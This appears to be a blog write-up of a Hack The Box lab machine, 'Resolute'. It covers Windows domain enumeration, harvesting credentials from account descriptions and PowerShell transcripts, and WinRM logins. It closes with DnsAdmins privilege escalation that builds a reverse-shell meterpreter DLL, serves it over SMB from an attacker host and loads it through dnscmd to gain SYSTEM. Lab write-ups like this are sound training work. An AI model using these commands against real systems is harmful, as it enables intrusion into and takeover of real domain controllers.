RESOLUTE WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 17:59 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 17:59
    Completed NSE at 17:59, 0.00s elapsed
    Initiating NSE at 17:59
    Completed NSE at 17:59, 0.00s elapsed
    Initiating NSE at 17:59
    Completed NSE at 17:59, 0.00s elapsed
    Initiating Ping Scan at 17:59
    Scanning 10.10.10.169 [4 ports]
    Completed Ping Scan at 17:59, 0.61s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 17:59
    Completed Parallel DNS resolution of 1 host. at 17:59, 0.55s elapsed
    Initiating SYN Stealth Scan at 17:59
    Scanning 10.10.10.169 [1000 ports]
    Discovered open port 135/tcp on 10.10.10.169
    Discovered open port 139/tcp on 10.10.10.169
    Discovered open port 445/tcp on 10.10.10.169
    Discovered open port 53/tcp on 10.10.10.169
    Discovered open port 636/tcp on 10.10.10.169
    Discovered open port 88/tcp on 10.10.10.169
    Discovered open port 593/tcp on 10.10.10.169
    Discovered open port 389/tcp on 10.10.10.169
    Discovered open port 464/tcp on 10.10.10.169
    Discovered open port 3268/tcp on 10.10.10.169
    Discovered open port 3269/tcp on 10.10.10.169
    Completed SYN Stealth Scan at 17:59, 5.30s elapsed (1000 total ports)
    Initiating Service scan at 17:59
    Scanning 11 services on 10.10.10.169
    Completed Service scan at 17:59, 32.87s elapsed (11 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.169
    Retrying OS detection (try #2) against 10.10.10.169
    Retrying OS detection (try #3) against 10.10.10.169
    Initiating Traceroute at 17:59
    Completed Traceroute at 17:59, 0.24s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 17:59
    Completed Parallel DNS resolution of 2 hosts. at 17:59, 0.21s elapsed
    NSE: Script scanning 10.10.10.169.
    Initiating NSE at 17:59
    Completed NSE at 18:00, 19.85s elapsed
    Initiating NSE at 18:00
    Completed NSE at 18:02, 121.98s elapsed
    Initiating NSE at 18:02
    Completed NSE at 18:02, 0.00s elapsed
    Nmap scan report for 10.10.10.169
    Host is up (0.48s latency).
    Not shown: 989 closed ports
    PORT     STATE SERVICE      VERSION
    53/tcp   open  domain?
    | fingerprint-strings: 
    |   DNSVersionBindReqTCP: 
    |     version
    |_    bind
    88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-29 12:40:45Z)
    135/tcp  open  msrpc        Microsoft Windows RPC
    139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
    389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
    445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
    464/tcp  open  kpasswd5?
    593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
    636/tcp  open  tcpwrapped
    3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
    3269/tcp open  tcpwrapped
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.80%I=7%D=5/29%Time=5ED10024%P=x86_64-pc-linux-gnu%r(DNSV
    SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
    SF:x04bind\0\0\x10\0\x03");
    Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (95%), Microsoft Windows Server 2016 (94%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 10 (92%), Microsoft Windows 10 1507 (92%), Microsoft Windows Server 2012 (92%), Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Uptime guess: 0.103 days (since Fri May 29 15:33:50 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=259 (Good luck!)
    IP ID Sequence Generation: Randomized
    Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: 2h31m25s, deviation: 4h02m30s, median: 11m24s
    | smb-os-discovery: 
    |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
    |   Computer name: Resolute
    |   NetBIOS computer name: RESOLUTE\x00
    |   Domain name: megabank.local
    |   Forest name: megabank.local
    |   FQDN: Resolute.megabank.local
    |_  System time: 2020-05-29T05:41:21-07:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: required
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2020-05-29T12:41:23
    |_  start_date: 2020-05-29T11:52:09

    TRACEROUTE (using port 110/tcp)
    HOP RTT       ADDRESS
    1   201.02 ms 10.10.14.1
    2   239.28 ms 10.10.10.169

    NSE: Script Post-scanning.
    Initiating NSE at 18:02
    Completed NSE at 18:02, 0.00s elapsed
    Initiating NSE at 18:02
    Completed NSE at 18:02, 0.00s elapsed
    Initiating NSE at 18:02
    Completed NSE at 18:02, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 190.07 seconds
            Raw packets sent: 1284 (58.614KB) | Rcvd: 1164 (48.694KB)

ENUMERATING FOR USERS

user:[Administrator] rid:[0x1f4]
    user:[Guest] rid:[0x1f5]
    user:[krbtgt] rid:[0x1f6]
    user:[DefaultAccount] rid:[0x1f7]
    user:[ryan] rid:[0x451]
    user:[marko] rid:[0x457]
    user:[sunita] rid:[0x19c9]
    user:[abigail] rid:[0x19ca]
    user:[marcus] rid:[0x19cb]
    user:[sally] rid:[0x19cc]
    user:[fred] rid:[0x19cd]
    user:[angela] rid:[0x19ce]
    user:[felicia] rid:[0x19cf]
    user:[gustavo] rid:[0x19d0]
    user:[ulf] rid:[0x19d1]
    user:[stevie] rid:[0x19d2]
    user:[claire] rid:[0x19d3]
    user:[paulo] rid:[0x19d4]
    user:[steve] rid:[0x19d5]
    user:[annette] rid:[0x19d6]
    user:[annika] rid:[0x19d7]
    user:[per] rid:[0x19d8]
    user:[claude] rid:[0x19d9]
    user:[melanie] rid:[0x2775]
    user:[zach] rid:[0x2776]
    user:[simon] rid:[0x2777]
    user:[naoki] rid:[0x2778]

Here After Going through names one by one I Got Password for marko!!

index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!

USING THOSE CREDENTIALS

root@liquid:~/Desktop/HTB/resolute# evil-winrm -u marko -p  Welcome123! -i 10.10.10.169

    Evil-WinRM shell v2.0

    Info: Establishing connection to remote endpoint

    Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

    Error: Exiting with code 1

Here We got Error Now its time to get real name for this password!!!

As we already have list of Users

After using winrm login bruteforce I gir melanie as user !!

Lets Login Again and grab the Flag!!

    root@liquid:~/Desktop/HTB/resolute# evil-winrm -u melanie -p  Welcome123! -i 10.10.10.169
    Evil-WinRM shell v2.0
    Info: Establishing connection to remote endpoint
    *Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt
    0c3be45fcfe249796ccbee8d3a978540
    *Evil-WinRM* PS C:\Users\melanie\Desktop> 

Lets Get Another User

    *Evil-WinRM* PS C:\> ls -hidden


        Directory: C:\


    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
    d--hsl        9/25/2019  10:17 AM                Documents and Settings
    d--h--        9/25/2019  10:48 AM                ProgramData
    d--h--        12/3/2019   6:32 AM                PSTranscripts
    d--hs-        9/25/2019  10:17 AM                Recovery
    d--hs-        9/25/2019   6:25 AM                System Volume Information
    -arhs-       11/20/2016   5:59 PM         389408 bootmgr
    -a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
    -a-hs-        5/30/2020  10:49 AM      402653184 pagefile.sys

We Have more hidden files under this!!

   *Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.    20191203063201.txt
    **********************
    Windows PowerShell transcript start
    Start time: 20191203063201
    Username: MEGABANK\ryan
    RunAs User: MEGABANK\ryan
    Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
    Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
    Process ID: 2800
    PSVersion: 5.1.14393.2273
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
    BuildVersion: 10.0.14393.2273
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************
    Command start time: 20191203063455
    **********************
    PS>TerminatingError(): "System error."
    >> CommandInvocation(Invoke-Expression): "Invoke-Expression"
    >> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',   $env:computername,' ',$((gi $pwd).Name),'> ')
    if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
    >> CommandInvocation(Out-String): "Out-String"
    >> ParameterBinding(Out-String): name="Stream"; value="True"
    **********************
    Command start time: 20191203063455
    **********************
    PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
    PS megabank\ryan@RESOLUTE Documents>
    **********************
    Command start time: 20191203063515
    **********************
    PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
    >> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan    Serv3r4Admin4cc123!

    if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
    >> CommandInvocation(Out-String): "Out-String"
    >> ParameterBinding(Out-String): name="Stream"; value="True"
    **********************
    Windows PowerShell transcript start
    Start time: 20191203063515
    Username: MEGABANK\ryan
    RunAs User: MEGABANK\ryan
    Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
    Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
    Process ID: 2800
    PSVersion: 5.1.14393.2273
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
    BuildVersion: 10.0.14393.2273
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************
    **********************
    Command start time: 20191203063515
    **********************
    PS>CommandInvocation(Out-String): "Out-String"
    >> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
    cmd : The syntax of this command is:
    At line:1 char:1
    + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [],     RemoteException
        + FullyQualifiedErrorId : NativeCommandError
    cmd : The syntax of this command is:
    At line:1 char:1
    + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [],     RemoteException
        + FullyQualifiedErrorId : NativeCommandError
    **********************
    Windows PowerShell transcript start
    Start time: 20191203063515
    Username: MEGABANK\ryan
    RunAs User: MEGABANK\ryan
    Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
    Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
    Process ID: 2800
    PSVersion: 5.1.14393.2273
    PSEdition: Desktop
    PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
    BuildVersion: 10.0.14393.2273
    CLRVersion: 4.0.30319.42000
    WSManStackVersion: 3.0
    PSRemotingProtocolVersion: 2.3
    SerializationVersion: 1.1.0.1
    **********************

ryan : Serv3r4Admin4cc123!

    root@liquid:~/Desktop/HTB/resolute# evil-winrm -i resolute.htb -u ryan -p Serv3r4Admin4cc123!
    Evil-WinRM shell v2.3
    Info: Establishing connection to remote endpoint
    *Evil-WinRM* PS C:\Users\ryan\Documents> 

GETTING ROOT ACCESS

 *Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

    USER INFORMATION
    ----------------

    User Name     SID
    ============= ==============================================
    megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


    GROUP INFORMATION
    -----------------

    Group Name                                 Type             SID                                            Attributes
    ========================================== ================ ============================================== ===============================================================
    Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
    BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
    BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
    BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
    MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
    MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
    NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
    Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


    USER CLAIMS INFORMATION
    -----------------------

    User claims unknown.

    Kerberos support for Dynamic Access Control on this device has been disabled.

user ryan is in dnsadmin group

   root@liquid:~/Desktop/HTB/resolute# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.140 LPORT=9977 -f dll > liquid.dll
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x64 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 510 bytes
    Final size of dll file: 5120 bytes

After This I have to Access this dll !!

It could be by uploading Or thorugh smbserver!!

  root@liquid:~/Desktop/HTB/resolute# python smbserver.py -smb2support EXPLOIT /root/Desktop/HTB/resolute/
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    [*] Config file parsed
    [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
    [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
    [*] Config file parsed
    [*] Config file parsed
    [*] Config file parsed

Then in victims machine

    *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> dnscmd  /config /serverlevelplugindll \\10.10.14.140\EXPLOIT\liquid.dll

    Registry property serverlevelplugindll successfully reset.
    Command completed successfully.

    *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> sc.exe stop dns

    SERVICE_NAME: dns
            TYPE               : 10  WIN32_OWN_PROCESS
            STATE              : 3  STOP_PENDING
                                    (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
            WIN32_EXIT_CODE    : 0  (0x0)
            SERVICE_EXIT_CODE  : 0  (0x0)
            CHECKPOINT         : 0x0
            WAIT_HINT          : 0x0
    *Evil-WinRM* PS C:\windows\system32\spool\drivers\color> sc.exe start dns

    SERVICE_NAME: dns
            TYPE               : 10  WIN32_OWN_PROCESS
            STATE              : 2  START_PENDING
                                    (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
            WIN32_EXIT_CODE    : 0  (0x0)
            SERVICE_EXIT_CODE  : 0  (0x0)
            CHECKPOINT         : 0x0
            WAIT_HINT          : 0x7d0
            PID                : 3048
            FLAGS              :

msfconsole

    msf5 exploit(multi/handler) > run

    [*] Started reverse TCP handler on 10.10.14.4:5678 
    [*] Sending stage (206403 bytes) to 10.10.10.169
    [*] Meterpreter session 3 opened (10.10.14.4:5678 -> 10.10.10.169:60148) at 2020-05-30 11:20:31 -0400

    meterpreter > 
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > cd ../../../
    meterpreter > cat root.txt
    e1d94876a506850d0c20edb5405e619c

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: